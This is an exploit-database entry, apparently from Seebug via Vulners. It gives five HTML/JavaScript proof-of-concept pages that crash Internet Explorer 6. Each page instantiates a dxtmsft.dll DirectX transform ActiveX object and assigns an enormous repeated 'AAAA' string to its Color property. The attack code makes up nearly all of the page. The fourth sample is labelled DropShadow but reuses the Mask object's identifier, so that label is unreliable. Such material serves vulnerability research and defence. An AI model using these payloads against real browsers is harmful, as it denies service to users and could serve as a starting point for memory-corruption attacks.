Lucene search
K

Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS

🗓️ 08 Dec 2006 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 30 Views

Microsoft IE dxtmsft.dll ActiveX DoS Vulnerabilit

Code

                                                //test on vmware xp sp2,IE 6
//crash poc1,IDXTMask
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc2,DXTChroma
<html>
<object classid='clsid:421516C1-3CF8-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc3,DXTGlow
<html>
<object classid='clsid:9F8E6421-3D9B-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc4,IDXTDropShadow
<html>
<object classid='clsid:ADC6CB86-424C-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>

//crash poc5,DXTShadow
<html>
<object classid='clsid:E71B4063-3E59-11D2-952A-00C04FA34F05' id='target' /></object>
<script language='javascript'>

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}
target.Color=b;

</script>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation